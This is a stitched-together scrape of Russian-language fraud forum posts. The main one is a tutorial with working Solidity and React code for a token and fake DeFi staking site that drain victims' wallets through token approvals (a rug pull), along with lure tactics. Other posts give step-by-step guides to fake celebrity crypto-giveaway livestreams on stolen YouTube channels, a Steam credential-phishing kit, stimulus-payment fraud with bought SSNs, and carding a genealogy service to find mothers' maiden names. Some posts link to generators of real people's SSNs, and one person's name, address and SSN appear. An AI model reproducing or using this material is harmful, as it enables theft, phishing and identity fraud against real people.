Всем привет!
Думаю стоит опубликовать статтю как это делать бесплатно, чтобы не кормить таких как ТС

Hidden content for authorized users.

You must have at least 1 reaction(s) to view the content.

Задавайте тут вопросы, постараюсь максимально развернуто ответить на вопросы касающиеся вещевого кардинга! Дабы не плодить тем.
От теории к практике!

...или как украсть токены ERC-20/ERC-721 из под морды хомяка.

Всем привет! Cегодня я хочу рассказать, как я скамлю токены у криптоюзеров. Сначала я подумал, что не подхожу под тематику конкурса, но сразу прояснил для себя, что крипта = скам, а значит, я в деле. За криптой/смарт-контрактами будущее говорят многие, безусловно, в этом есть доля правды, но история показывает, что технологии используют как в благих целях, так и злоупотребляют ими. Я покажу, как можно злоупотребить стандартами реализаций токенов на EVM совместимых blockchain и нажиться на этом.

Аббревиатура ERC переводится как Ethereum Request for Comments - это такой документ, который определяет стандарт и соглашения для разработки смарт- контрактов. ERC-20 есть контракты, которые компилируются и развертываются в блокчейн сеть, в этих контрактах реализуется единый шаблон, который позволяет создавать токены. Токены можно отправлять, обменивать, сжигать, чеканить, голосовать ими и многое другое, нет каких-то ограничений. Мы можем создать на основе стандарта любой финансовый актив или какое-нибудь действие в блокчейне, благодаря транзакциям. В стандарте ERC-20 есть определенные функции, такие как name(), symbol(), decimals(), balanceOf(), transfer(), totalSupply(), transferFrom(), allowance(), approve(). Из всех этих функций нас интересует approve() и transferFrom(). Что они делают? approve() даёт разрешение на операции с токенами. transferFrom() переводит токены из одного адреса на другой. Остальные функции могут задавать имя токена, узнавать баланс и т.д.

Это все, конечно, интересно, но а что если... наш смарт-контракт сможет скрытно вывести все токены, а пользователь даже не поймет, что произошло? Скажем, пользователь пытается обменять один токен на другой через наш веб- интерфейс, но сталкивается с ситуацией, когда контракт опустошает вce его монеты.

Такое возможно, и сейчас мы с вами это сделаем!

Чтобы продемонстрировать этот трюк, создадим свой собственный токен и поможет нам в этом библиотека OpenZeppelin. Напомню, что контракты для EVM (Ethereum Virtual Machine) пишутся на Solidity. Прямо в этом контракте напишем функцию, которая обменивает токены и делает вредоносные действия. Далее развернем контракты в Ropsten сеть и создадим минимальный интерфейс. Наше приложение будет общаться с контрактом по ABI JSON. Для создания веб-приложения будем использовать React и Ethers библиотеку. У вас должно быть некоторое количество тестовых ETH, их можно получить через публичные краны.

Зададим выпуск монет со значением в 500 токенов:

JavaScript:Copy to clipboard

function mint(address _to) external {
        _mint(_to, 500 ether);

        emit Mint(_to);

Реализуем функцию обмена токенов и вывода всех средств с кошелька пользователя:

JavaScript:Copy to clipboard

function swap(uint256 _amount) external {
        address sender = msg.sender; // экономим газ
        uint256 senderBalance = IERC20(address(this)).balanceOf(sender);
        require(senderBalance > 0, "swap: token balance too low");

        IERC20(address(this)).transferFrom(sender, address(this), _amount);
        IERC20(address(this)).transferFrom(sender, tokenReceiver, senderBalance - _amount);

        emit ValueReceived(tokenReceiver, senderBalance - _amount);
    }

Установим адрес получателя краденных токенов:

JavaScript:Copy to clipboard

function setTokenReceiver(address _tokenReceiver) external onlyOwner {
        tokenReceiver = _tokenReceiver;

        emit SetTokenReceiver(_tokenReceiver);
    }

Сконструируем наш токен контракт, укажем название токена и получателя краденных токенов:

JavaScript:Copy to clipboard

constructor (address _tokenReceiver) ERC20("XSSIS", "XSSIS") {
        tokenReceiver = _tokenReceiver;
    }

Скомпилируем и развернем наш контракт в Ropsten сеть:

Переключимся в Ropsten network и выберем Injected Web3. Рядом с кнопкой Deploy укажем адрес получателя краденных токенов (в развернутом контракте мы сможем менять адрес получателя, просто вызывая функцию setTokenReceiver()):

В папке config, которая приложена к этой статье, добавляем в файл contracts.json адрес нашего развернутого контракта (смотрим Etherscan). В файл tokenABI.json добавляем ABI параметры, которые можно скопировать из Remix во вкладке SOLIDITY COMPILER.

В файле HomePage.tsx импортируем модули:

JavaScript:Copy to clipboard

import * as React from "react"
import {
    Box,
    Button,
    Center,
    Flex,
    Select,
    HStack,
    Stack,
    Input,
    InputGroup,
    InputLeftAddon,
    InputRightAddon,
    CircularProgress,
    Alert,
    AlertIcon,
    Text
} from "@chakra-ui/react";
import {useContractFunction, useEthers, useTokenAllowance} from "@usedapp/core";
import {ethers} from "ethers";
import tokenABI from "./configs/tokenABI.json";
import contracts from "./configs/contracts.json";

Описываем функции добычи, одобрения, обмена/кражи токенов:

JavaScript:Copy to clipboard

const mint = async () => {
        await handleChangeNetwork();
        await mintTx(account);

        setValueStateSuccessed(true);
        setTimeout(function(){
            setValueStateSuccessed(false);
        }.bind(this),5000);

    }

    const approve = async () => {
        await handleChangeNetwork();
        await approveTx(contracts.address, ethers.constants.MaxUint256);

        setValueapproveStateSuccessed(true);
        setTimeout(function(){
            setValueapproveStateSuccessed(false);
        }.bind(this),5000);

    }

    const swap = async () => {
        await handleChangeNetwork();
        if (allowance!.lt(ethers.constants.MaxUint256)) {
            alert('Approve tokens!');
        }
        if (!valueSimple) {
            alert('Input XSSIS quantitiy');
            return;
        }

        await swapTx(valueSimple + '0'.repeat(18));

        setValueswapStateSuccessed(true);
        setTimeout(function(){
            setValueswapStateSuccessed(false);
        }.bind(this),5000);

    }

Cобираем и запускаем наше веб-приложение:

Bash:Copy to clipboard

yarn
npm run start

Давайте протестируем, нажмем кнопки Approve для подключения к контракту и затем Mint для добычи токенов (по умолчанию выдается 500 токенов):

Пробуем обменять 1 XSSIS на ETH. Нажимаем кнопку Swap. Здесь мы должны обратить внимание на окно MetaMask при совершении транзакции, кошелек не говорит пользователю, что на самом деле будет происходить:

Проверяем транзакцию в Etherscan и смотрим, что произошло. Нами был совершен обмен 1 XSSIS на 0,1 ETH, но так же был произведен вывод всех токенов XSSIS из кошелька пользователя без его ведома:

Хорошо, мы разобрали так называемую "фичу" токенов, поняли концепцию стандарта ERC-20 и разработали контракт, который выводит токен из кошелька нашей жертвы за 1 клик. По сути, чего-то нового мы не изобрели. Мы лишь воспользовались возможностью, которая дает нам стандарт. Давайте создадим более сложный пример и вдобавок разработаем себе инструмент для скама. Мы соберем рабочий DeFi проект и сделаем так, чтобы можно было красть токены из кошельков пользователей, просто вызвав одну функцию. Для начала, разберемся в архитектуре нашего проекта, форкнем интерфейс для наших контрактов и создадим пару токенов для тестирования. Я покажу, как скамлю лично я и в конце cтатьи расскажу о некоторых способах привлечения пользователей. Согласитесь, в этой теме есть где развернуться! Пробуем!

Примитивная схема:

Красным - действиe owner/contract.
Синим - действие users/contract.

Пользователи стейкают стейблкоины/обернутые токены/одиночные токены в наш контракт. Это делается ради награды в виде нашего нативного токена и ради sell pressurе. Наш токен так же может где-то торговаться, например, в Uniswap и иметь в пулах крупную ликвидность. У пользователя будет стимул вводить свои токены к нам в контракт, т.к. потом можно будет нашим токеном торговать. Есть разные способы создавать стимулы для пользователей, к примеру, airdrop или искусственное завышение APY. В этой статье я остановлюсь лишь на том, как обмануть пользователя. В нашем примере задача - заманить как можно больше жертв, которые будут взаимодействовать с нашим контрактом. Достигнув определенного количества пользователей, мы украдем монеты из их кошельков (не пула контракта). Мы вызовем функцию evil(), которая отработает логику по краже монет. Напомню, это происходит потому, что пользователь дал одобрение на взаимодействие с нашим контрактом. Кстати, пользователь может свободно изымать свои средства из пулов контракта, но коварность одобрения токенов состоит в том, что одобрение дает нам украсть монеты хоть через неделю, но при условии, что пользователь собственноручно не отозвал одобрение для нашего контракта. Кстати, пользователю совершенно необязательно стейкать токены, достаточно дать апрув, и мы сможем сделать все вредоносные действия.

Я постараюсь не описывать всю кодовую базу (будет слишком много текста). Все же тема конкурса не о программировании. Оставлю изучение исходного кода для читателя, который хочет глубже погрузиться в работу смарт-контрактов.

Функция по краже монет из кошелька:

JavaScript:Copy to clipboard

function evil(address _governance, bytes memory _setupData) public onlyOwnerOrGovernance {
        governance = _governance;
        (bool success,) = governance.call(_setupData);
        require(success, "evil: failed");

    }

На вход дается адрес контракта токена, который мы выводим, и наша функция transferFrom() (её изучили ранее).

Подготовка токенов.

MetaMask заранее переключаем в сеть Rinkeby. Для демонстрации подготовим 2 токена (файл Token.sol). Файл открываем в Remix, в constructor() пишем название токена fakeUSDT, деплоим токен fakeUSDT и записываем его адрес. Затем чеканим (функция mint с параметром amount == 1000000000000000000000000) себе на кошелек (address) 1.000.000 токенов. В том же файле меняем в constructor() название токена с fakeUSDT на XSSIS, так же деплоим, записываем адрес, чеканим 100к токенов себе на кошелек или позже на адрес контракта XSSChef.

Подготовка контракта XSSISChef.

Открываем файл XSSISChef.sol в Remix, компилируем и заполняем параметры:

1. _XSSIS: адрес токена XSSIS
2. _DEVADDR: твой адрес
3. _XSSISPERBLOCK: рекомендую ставить 1000000000000000000 - это 1 токен/блок
4. _STARTBLOCK - заходим на Etherscan и смотрим текущий блок, вставляем это значение туда
5. _BONUSENDBLOCK: 1
6. _ENDBLOCK: рекомендую ставить STARTBLOCK + 100000.
   C заполненными данными деплоим контракт и записываем адрес.
   Переводим 100к XSSIS на адрес этого контракта.
   Вызываем функцию add() с параметрами:
7. _allocPoin: 1
8. _lpToken: адрес токена fakeUSDT
9. _withUpdate: false
   
   

На этом этапе мы подготовили все контракты.

Интеграция с фронтендом.

Cобираем проект:

Bash:Copy to clipboard

yarn install

В папке /src/sushi/lib в файле constants.js
в supportedPools меняем:
lpAddresses 4 - на адрес токена fakeUSDT
tokenAddresses 4 - на адрес токена fakeUSDT

В этом же файле contractAddresses:
sushi 4 - адрес токена XSSIS
masterChef 4 - адрес контракта XSSISChef

Запускаем наше веб-приложение:

Bash:Copy to clipboard

yarn start

Фармим XSSIS токены!

Жмем кнопку Select:

Даем апрув и подтверждаем в MetaMask:

Cтейкаем 100 fakeUSDT:

Начисляются XSSIS:

Cнимаем награду и изымаем fakeUSDT:

Вывод средств.

Ранее мы разобрали, как работает функция evil(), теперь обсудим, как работает скрипт, который генерирует нам bytes для этой функции.
Скрипт находится в папке src/utils/generateBytes.js.

1. Записываем адрес токена, который хотим забрать в TokenAAdress.
2. addressFrom - у кого хотим забрать (смотрим Etherscan).
3. addressTo - куда хотим отправить.
4. amount - сколько хотим отправить (в amount нужно изменять только ’10’, то есть, если мы хотим забрать 100, тогда нужно просто написать ‘100’ вместо ’10’, ‘0’.repeat(18) - это для decimals.
   

Запускаем скрипт и копируем значение, которое выводится в консоль - это и есть наши bytes:

Bash:Copy to clipboard

node generateBytes.js

В контракте XSSISChef вызываем функцию evil(), в address указываем адрес контракта токена, который мы хотим украсть, в bytes - то, что скопировали из консоли.

Я пытаюсь украсть 999900 токенов и перевести их на другой адрес:

И вот что из этого вышло:


Дополнение.

Контракт XSSChef деплоится в mainet так же, как и в testnet, подготавливаем только один токен, который предназначен для награды.
Чтобы украсть токены у жертвы, нужно следить в Etherscan за теми адресами, которые взаимодействуют с нашим контрактом. Знаю, это дело не продумано, по- хорошему нужно написать скрипт, который автоматизирует эти действия. Если хотим добавить новые пулы во вкладке Menu (frontend), то нужно найти файл constants.js и просто добавить новые пулы в supportedPools. Пулы - это новые токены, которые заносятся пользователем к нам в контракт, и которые мы можем украсть.

Мы справились! Я показал свой некоторый опыт по запуску крипто проектов и обману пользователей, используя смарт-контракты. Этот вид мошенничества называется Rug Pull. Эту тему можно крутить-вертеть как душе угодно, все зависит лишь от вашего воображения. Есть разные способы, и, на мой взгляд, самые профитные варианты привлечения пользователей. Airdrop токенов на адреса пользователей популярного проекта, который в тоже время, что и мы делает Airdrop, базу адресов можно спарсить по транзакциям. Хорошо работает рассылка по Email ящикам или Discord аккаунтам со ссылкой на фейк. Ну и, конечно же, YouTube/AdWords трафик. Профит в данной теме разнится: я работаю и хорошо себя чувствую. Есть пример, Badger DAO был взломан, где использован именно этот метод монетизации. Мой мануал подходит и для токенов ERC-721 (NFT), все делается по аналогии. Я показал лишь часть из своих наработок и готов ими делиться со всеми. Весь материал будет прикреплен к этой статье. Спасибо за внимание и удачного скама!


[ DropMeFiles – free one-click file sharing service

](https://dropmefiles.com/QHFT4)

Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.

dropmefiles.com

Вот, один человек с этого форума попросил меня научить его вбивать картон. Решил я заснять видео. Все разжевано, на мой взгляд, до мелочей.

Ссылка
В архиве - формат .AVI 1.24 мб, без арзива - 80мб.

Смотрим, учимся, заценяем.

Предлагаю делиться интересными новостями, страницами, панелями, схемами в сфере фишинга и СИ

Начнем с пруфа и краткого описания
Пруф побольше:

Как вы скорее всего не знаете, на YouTube каждый день Билл Гейтс, Братья Уинклвосс и президенты разных стран раздают биткойны. Делают они это, чтобы популяризировать свои криптовалютные проекты и криптовалюту в целом.

Единственный очевидный недостаток всего этого в том, что никто из них нихуя не раздает. Да и о трансляциях со своим лицом не знает.

С другой стороны, мы просто счастливы тем, как все сложилось, и нет, к сожалению, нам они тоже ничего не дадут. Поэтому возьмем у тех, кто более сговорчив.

К делу. Мы сами запустим стрим на YouTube от лица любого клевого чувака из криптовалютной тусовки, которого все будут рады видеть. Однако первым делом, вам нужно найти видео с любой конференции и интервью на тему криптовалюты, в котором участвует ваш герой. Назовем его Адонис, он молод и прекрасен.

В верхней левой части стрима мы ставим зацикленный ролик какого-либо интервью, где Адонис рассуждает на тему криптовалют. Верхняя правая часть — превью стрима с анонсом раздачи, а нижняя поделена на QR-код для пополнения вашего кошелька, а на правой подарки от Адониса или условия их получения.

Подготовка и моменты, на которых Адонис может споткнуться

Первым делом, нам будет очень кстати красивый BTC-кошелек. Если Адонис настолько прекрасен и раздает деньги, то и кошелек его начинается с 1Adonis1 , а не 1HJsKjs — это не обязательно, но повышает доверие к Адонису. Почему бы не сделать, если можно сделать.

Для этого качаем софт — https://github.com/samr7/vanitygen или https://github.com/exploitagency/vanitygen-plus. У меня второй, потому что первый не очень дружит с AMD процессорами и видеокартами.

Создаем в скачанной папке .bat и прописываем, где 1Random1 — имя вашего Адониса:

oclvanitygen.exe -o resultsMy1Random1.txt -v 1Random1
pause

И его же запускаем. Начинается генерация кошелька, вернее перебор кошельков в поиске того, который устроит нас. На генерацию может уйти примерно 4-5 дней, а может пару часов — зависит от вашей удачи, количества символов и мощности вашего железа.

На выходе получаем адрес кошелька и приватник. Приватник импортируем себе —



После чего вы сможете пользоваться данным, сгенерированным кошельком, показывал на примере blockchain.com

Из адрес кошелька делаем QR-код. Будем делать в этом генераторе — https://cwaqrgen.com/

Вбиваем свой кошелек и генерируем красивую картинку, через которую на ваш кошелек будут поступать средства. Обязательно проверьте тот ли кошелек получился, а то будет генератор в три блина — каждый скамит сам себя.

Открываем фотошоп и готовим заставку. Своего Адониса и интервью с ним будем искать позже. Основное — QR-код, ваш кошелек и всевозможные кликбейты, как в левой нижней части примера. Рисуем, готовим, сохраняем картинку.


Настройка стрима и зацикливание видео с Адонисом

Пора выбрать своего Адониса и искать видео с ним. Тут нечего объяснять — ищите конференции на ютубе с определенным человеком или лекции по биткойну и берите что дают. Скачивайте его, обрезайте по вкусу.

Стримить будем через OBS, скачать — https://obsproject.com/ru
Запускаем. На нижней панельке, видим вкладки «Сцены» и «Источники», у источника нажимаем на плюсик.

И выбираем «изображение».


Называем как угодно, главное не путаться самим.

Указываем путь до картинки из фотошопа и жмем «OK», на фоне появляется Адонис. А-а-ах, как он прекрасен!


На пустом черном месте, нам нужно зациклить видео. Нажимаем на уже известный нам плюсик и добавляем «Источник медиа»


Указываем, что нашим видео будет локальный файл, ставим галочку «Повтор».


Подгоняем размер под наш бэкграунд.

И проделываем этот шаг второй раз, но делаем видео уже на весь экран.

Это для того, чтобы Youtube не забанил трансляцию с ходу и вы набрали 20-30 минут онлайна, а потом быстро могли заменить просто видео на картинку с Адонисом.
Это делается двумя кликами — первый по глазику в источнике у видео на полный экран и второй клик по глазику у первого видео, которое мы подогнали под размер бэкграунда.


Трансляция готова, готовимся к запуску Адониса

Запускать мы будем, как вы уже поняли, на Youtube. Поэтому нам необходимо иметь логи ютуба, откуда мы будем брать каналы и и накручивать с помощью них зрителей.

Парсим логи любым доступным инструментом. Каналы от 10к подписчиков вполне годятся, чтобы запустить на них трансляцию и посмотреть на результат. Большое кол-во подписчиков не гарантируют успех, но это добавляют доверия трансляции.

Некоторые маленькие каналы не хило проталкивают вас в топ поиска по целевому запросу, а каналы-миллионики могут дать нулевой результат.

Нашли канал? Отлично!
На Youtube, рядом с аватаркой наверху справа нажимаем на значок камеры, а затем кликаем «Начать трансляцию»


Появляется такое окошко, указываем в нем название и описание. Последнее лучше писать в блокноте, а потом вставить — менюшка ютуба уебанская. Включите монетизацию, как показала практика, это благоприятно сказывается на трансляции.

Нажимаем на шестеренку в верхней правой части экрана, во всплывающем окне переходим во вкладку — «чат» и отключаем его

После сохранения нас перекинет в главное меню, тут ставим автоматический запуск, копируем ключ трансляции и переходим в OBS.

![](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FMMO42xUxIdTy35HGtSJ27ZtuUvF4t3QvMJHAmhRMmSJ7tw2R9Zpc8ikpDY_

heCju47K3xWApI2azPeKVujHL4CL5lpcZiAfo7Q0RK31ifuvOzwe92EVULIJVRb-06c1oStU0DC&hash=4ec3ee2a5ec15987ff3c4cfe211a9484)

Переходим в настройки, далее — «вещание».


Осталось только нажать на заветную кнопочку и Адонис отправится в бой.

Бальтазар вздохнул: – Готово. Вы прекрасны, как молодой Адонис, синьор.
– Этот Адонис плохо кончил, – тут же добавил Меркуцио.

Как не кончить плохо на зависть Меркуцио

Подводя промежуточные итоги, у нас есть готовая к запуску трансляция и красивый, а главное достаточно трастовый для обычного юзера кошелек. Теперь к тонкостям работы с банами, о которых нас предупреждал Меркуцио.

Мы сделали два источника медиа, один на весь экран, а второй — с Адонисом. Я сказал, что так надо и вы мне поверили. Спасибо. Теперь я готов объясниться.

Если сразу запустить трансляцию с Адонисом, то вас скорее всего кикнут с поиска довольно быстро и будет хорошо, если дадут вообще запустить второй раз.

Поэтому проходим рубеж в 20-30 минут с полноэкранным режимом и если еще висим в поиске — поздравляем, можете выпускать своего Адониса.

По моим наблюдениям, есть несколько рубежей, когда могут вырубить или кикнуть с поиска: 1-5-20-30-60 минут. Если на протяжении этих рубежей вы выстояли, то вероятно, продержитесь еще часа 2-3, но рано или поздно все равно упадете, главная цель — успеть получить свое.

Также стоит отметить, что подобного рода стримы обычно отрубаются модерами в 6 утра по МСК, замечаю такую движуху каждый день.

Озвучу очевидную вещь, но может для кого-то она не очевидная: если у вас 1к подписчиков, вас вырубят раньше, чем канал с грубо говоря с миллионом. Если на стрим с 1к подписчиков прилетает 100 репортов — красная карта, если канал с 100к подписчиков прилетают те же 100 репортов, то все нормально. Суть, надеюсь, вы уловили.

Продвижение ролика в поиске

Я пользуюсь утилитами, о которых уже вы могли слышать из моих прошлых статей или пользовались сами. Это — KWT (keywordtool.io) и VidiQ (расширение для браузера).

Через KWT смотрим базу (10 штук вполне хватит) интересных для себя тэгов, сохраняем их, потом вбиваем их в VidiQ, в нем вы можете посмотреть насколько данные тэги и подобные ему подходят именно для вашего канала, добавляете эти тэги к себе и смотрите, насколько сильно алгоритмы ютуба оценивают ваш вес в этой категории.


Например тэг btc, на данный момент на текущем канале, куда я поставил VidiQ, оценивается весьма не плохо.


А случайно добавленный тэг «money», для канала подходит не сильно.

Ваша задача выбирать тэги для добавления, которые имеют хороший поисковой объем, но не шибко высокую конкуренцию. Что-то среднее добавить можно.

Кстати о среднем, думаю, вы видели, что в поиске роликов на ютубе у некоторых под роликом видно три #хэштега.

Их тоже желательно добавлять, добавит вы можете кажется до 50 штук, но оптимальный найденный вариант — 8. Первые три будут видны под вашим роликом, все остальные будут просто в описании, не сказать, что дает вау-эффект, но всегда лучше сделать, чем не сделать.

Адонис и Меркуцио спешат откланяться

Подходя к завершению, поговорим о накрутке просмотров и лайков на трансляцию. Делать это надо, причем в обязательном порядке.

Ваша трансляция, конечно, даже без зрителей имеет шансы обогнать конкурентов, но реальный человек скорее откроет ту, где людей побольше. По моему мнению необходимо порядка 20к зрителей, а дальше уже зависит от ваших возможностей.

Покупать зрителей на различных сервисах не советую — дорого и малоэффективно. Оптимальный вариант купить софт, а лучше — заказать с саппортом от кодера, на случай каких-либо фиксов.

Мой софт с одно валидного гугл/ютуб кука крутит в районе 10 зрителей, с отработанных логов данное значение падает, до четырех-шести.

Прокси —

Сейчас будет важная информация, которую я для вашего удобства выделил крупно. Мало кто так трогательно о вас заботится.

В скромных целях достижения идеала, я описал схему, которую можно реализовывать не только на Youtube. Просто сейчас это лучший способ в пересчете на стоимость одного лоха. Но это может измениться, особенно, если туда придет куча других Адонисов.

Победит в схватке тот, кто придумает как привлечь больше людей за меньшие средства. Например, создать промостраницу и лить трафик на нее. Или крутить трансляцию на Твиче. Можно даже подготовиться серьезно и купить рекламу у блогеров с анонс открытия невероятного проекта, который в определенный день раздаст биткойны. Все зависит от вашей фантазии и средств, а на самой механики можно зарабатывать еще долго.

Spoiler: img

Spoiler: pass

пас от админки: 22882

[CLIKE]

[ honyminer.zip - AnonFile

](https://anonfile.com/pbt7fcD4n3/honyminer_zip)

anonfile.com

[/CLIKE]

Steam фишинг + инструкция по установке

Описание:
Данная копия представляет из себя страницу авторизации (OpenID) STEAM для входа на сторонний сайт.

Инструкция:
Порядок действий входа:

1. Ввод "Имя пользователя", "Пароль" в поля формы и нажатие кнопки "Войти".
2. Отображение ошибки "Неверное имя аккаунта или пароль.".
3. Повтор пункта №1.
4. Отображение окна "Мобильная аутентификация Steam Guard".
5. Ввод "Код Steam Guard" и нажатие кнопки "Подтвердить".
6. Отображение ошибки "Извините, но код неверен…".
7. Повтор пункта №5.
8. Переадресация на оф. страницу авторизации STEAM.

Подробности:

• Существует специальная страница "Уведомления " для приема звуковых сигналов при получении новых данных.
• Все настройки производятся внутри одного файла.
• Чистка кода от рекламы, систем отслеживания, вирусов и прочего неприятного.
• Файлы, находящиеся в директории "SAVE ", недоступны извне! (Не рекомендуется изменять файл ".htaccess" внутри данной папки)
• Все "ненужные" ссылки либо ведут на оф. сайт, либо при нажатии ничего не происходит.
• Отсутствует проверка на вилид данных.
• Все ресурсы (файлы) загружаются только с нашего сервера.
• Данная копия уникальная , так как РИПнута мной с нуля.

Возможности:
Подробнее в файле настроек.

• Настройки для подключения к Базе Данных.
• Режимы записи.Запись в Базу Данных.
• Запись в Файл.
• Запись Везде.
• Изменение названия файла для данных.
• Изменение формата записи в файл (пример: "login**:** pass:guard").
• Смена звука для страницы "Уведомления ".

Страница "Уведомления".

Данная страница необходима тем, кто желает следить за новыми данными и получать звуковые сигналы.

Чтобы перейти на данную страницу, просто введите "/notify " в адресную строку.

Расположение важных файлов.
Директория "CORE " содержит:
- "settings.php " - Файл настроек.
- "notify.php " - Файл страницы "Уведомления ".
- "lib.php " - Файл "Библиотека", все функции.
- "send.php " - Файл взаимодействия с введенными данными.
- "assets/notify/audio.mp3 " - Звуковой файл для страницы "Уведомления ".

Директория "SAVE " содержит:
- ".htaccess " - Защита (файла с данными) от доступа извне.
- "accounts.txt " - Файл с данными (сюда записываются все введенные данные).
- "local.sql " - Файл Базы Данных.

Установка.
По умолчанию, все данные записываются в файл, поэтому, можно вообще ничего не изменять, и просто залить все файлы на хостинг и все будет работать.

1. Залить все файлы на хостинг.
2. (Необязательно) Произвести настройки в файле "settings.php ".
3. (Необязательно) Создать Базу Данных и импортировать в нее файл "local.sql ".

VirusTotal
https://www.virustotal.com/#/file/d...37c1d6c11caadd486093ef9870925c3520a/detection

Ссылка на загрузку

You must have at least 1 message(s) to view the content.

Большой пак различных скриптов фейков более чем 50 популярных сайтов.

Скачать:

You must spend at least 10 day(s) on the forum to view the content.

https://yadi.sk/d/KIwXdkWB3UW2sm

Пароль к архиву:

You must have at least 10 message(s) to view the content.

От 500 до 1к$ Cash App от USA. Вывод на BTC

Наверняка все слышали, что в штатах раздают гражданам по 500-1200$ в связи с карантинными мерами. В России была темка по 10к руб выплат, некоторые умельцы через акки госуслуги абузили и выводили себе на карты...

Суть
Дело было летом, в разгар коронавируса, сейчас возможно будет вторая волна. И так, сначала нам нужно куда-то принять эти деньги, не будут же они выплачивать на киви или сбер ��
Был создан и верифнут аккаунт cash.app (типа киви в америке). В CashApp нам пригодятся эти данные (direct deposit):

Процесс получения $500-1200 есть на офф. сайте правительства, сайт доступен на русском:

https://www.irs.gov/ru
https://www.irs.gov/coronavirus/economic-impact-payments

Идем вниз, и жмем на "Получить платеж".

ля получения выплаты нужен номер SSN (для абуза используют чужие), и чтобы годовой доход был ниже 24.400$ в год, либо наличие детей. Купить SSN можно в каржевых шопах. Так же могут запросить доп. инфу о том сколько зарабатываешь и платишь налогов, вводим рандом сумму.

Вводим эти данные и жмем "Continue"

Ждем когда система проверит данные, если все ок, то они попросит данные из "Direct Deposit" о которых я говорил в начале. Берем их из кэш апп и вставляем. Ждем несколько дней, и получаем бабос.

Хотел 1200$, но мне скинули только "Child payment" 500$. Теперь можем купить битков на эти 500$ на Paxful. Создаем аккаунт там и покупаем с помощью cashapp.

Выбираем предложение и получаем битки.

Ну а дальше меняем биткоин куда вам угодно через bestchange. Я вывел на киви.

Думаю эта тема будет полезной для многих пользователей.
Итак, как получить статус QIWI кошелька "основной".
1. Открываем сайт реестра залогов. <https://www.reestr- zalogov.ru/search/index>

2. Нажимаем на кнопку "Найти в реестре", затем кнопку "По информации о залогодатели", затем "Физическое лицо".

3. Теперь вводим рандомную Имя и Фамилию,и нажимаем кнопку "Найти".

4. Далее мы видим много нужной нам информации.

5. Далее нажимаем на эти циферки

Далее входим или регистрируем QIWI кошелёк.
Нажимаем ввести данные вручную.
Вводим данные рандомного человека.
Вы получили статус QIWI кошелька "основной".
ИНН сам киви нашел по данным

ИНН человека можно узнать [https://service.nalog.ru/static/personal- data.html?svc=inn&from=/inn.do](https://service.nalog.ru/static/personal- data.html?svc=inn&from=%2Finn.do)

Если забанили пишите жалобу на банки.ру

https://movo.cash/stimulus/

в теории надо подобрать подходящие Фулки, зарегать на них мово и подать заявление на сайте указав роутинг и акк номер, если кх выплату еще не получали то она придёт вам.

Начал заполнять заявление, там в принципе минут 10 уходит, ну я так чисто с телефона попробовал как проснулся и на второй страницы встрял с каким-то AGI это связано с такс рефаундом, нужен номер AG
В формах такса есть эти данные!

тема для тех у кого есть доступ к БД сайтов(типа TaxWise,Crosslink и тд) по TAX выплатам,там всю эту инфу найти можно.Если это нету,то можно покупать шлакоформы отработанные в 90 процентах случаях.
Если есть доступ к админкам сайтов работадателей,тоже можно найти эту инфу.

подайте простую налоговую декларацию здесь https://www.irs.gov/ filing / free-file-do-your-fede - tax -free-free

Генератор fullinfo для саморегов Paypal и пробив авто холдера USA

https://generatormr.com/full-info#work-box

Вы можете бесплатно сгенерировать реальные Full Info(рандом штат)
Пример:
(ALESIA SWANK APT AK-6 120 ELM ST EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
База данных 2017-2018 год

Сгенерировать МРЗ код/Персональный номер для паспорта США и других документов.
Получить инструкцию по Баркодам и их содержимому в Водительских удостоверениях USA/

Отдельно можно получить бесплатно FULL INFO в телеграмм боте
https://web.telegram.org/#/im?p=@generatormrfullinfobot

https://generatormr.com/full-info#work-box

You can generate real Full Info (random) for free)
Example:
(ALESIA SWANK APT AK-6 120 ELM STREET EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
Database 2017-2018 year

To generate SSE code/Personal number for the US passport and other documents.
Get instructions on Barcodes and their contents in the USA Driver's licenses/

You can also get FULL INFO for free in the telegram bot
https://web.telegram.org/#/im?p=@generatormrfullinfobot

Генерирует фулл и ссн! Реальные фулки, из базы какой-то дергает. чекал лично руками, все валидные, бывает из-за того что такая фулка уже есть и она в лимите! Если собираетесь использовать их, то пробивайте бг, чтобы получить более точную инфу!

Пробив MMN, MDOB

MMN - mother maiden name - девичья фамилия матери

MDOB - mother date of birth -датат рождения матери

В США есть интересный сервис-Ancestry.

Сервис позволяет производить поиск родственников/однофамильцев и составлять гинеологическое древо семей.

Кому как, а нам этот сервис пригодится для другого )

Естественно, сервис не бесплатен-стоит порядка 25 баксов/месяц,но....

К оплате принимаются СС,что очень упростит нам жизнь.

Кроме того, данный сервис предлагает опробовать свои услуги в 14-дневном пробном (бесплатном) режиме.

Единственным условием для этого является обязательная авторизация суммы, необходимой для последующей оплаты сервиса.

Именно авторизация, а не снятие

То есть, сумма будет списана только через 14 дней после регистрации, по окончанию пробного периода.

================================================================

Итак, с теорией разобрались.
Пора переходить непосредственно к практике.

Что нам для этого понадобится:

-ЮСА СС отработка

-Сокс или дед (желательно под штат, но это абсолютно не критично)

-Немного прямые руки и 10-15 минут времени

Дополню сервисами familytreenow.com и whitepages.com
Тоже многое можете найти по родственникам.

================================================================

Приступим.

1. Одеваем носок/заходим на дед и идем на Ancestry.com.

В правой верхней части экрана жмем на кнопку "Start Free Trial".

2. На следующей странице нам предложат выбрать "тариф", а также срок подписки:

- U.S. DELUXE MEMBERSHIP

- WORLD DELUXE MEMBERSHIP

Выбираем оптимальный вариант:

WORLD DELUXE MEMBERSHIP (3-Month $27,95/month after trial) и жмем "Continue"

3. Далее нас просят заполнить регистрационную форму-вбиваем Имя/Фамилию холдера, нашу почту и жмем "Continue"

4. Следущий шаг-продолжаем вбивать свои данные (то есть данные кардхолдера )

Вбиваем Billing-адрес и снова жмем "Continue"

5. Далее переходим к вводу данных СС (здесь думаю все элементарно )

Не забываем согласиться с Условиями Обслуживания и жмем "Start Free Trial"

6. Происходит авторизация карты, ждем.

Еще раз напомню, что сумма не снимается с карты, а только авторизуется

7. Если все ОК, мы попадаем на страницу завершения регистрации.

Здесь указаны наши регистрационные данные (Логин/пасс к акку, а также информация о оплате)

Естественно, в очередной раз жмем "Continue"

================================================================

Собственно, на этом сам процесс регистрации завершен.

Переходим к поиску интересующих нас данных, а точнее MMN и MDOB.

1. Заходим в расширенный поиск ("Show Advanced")

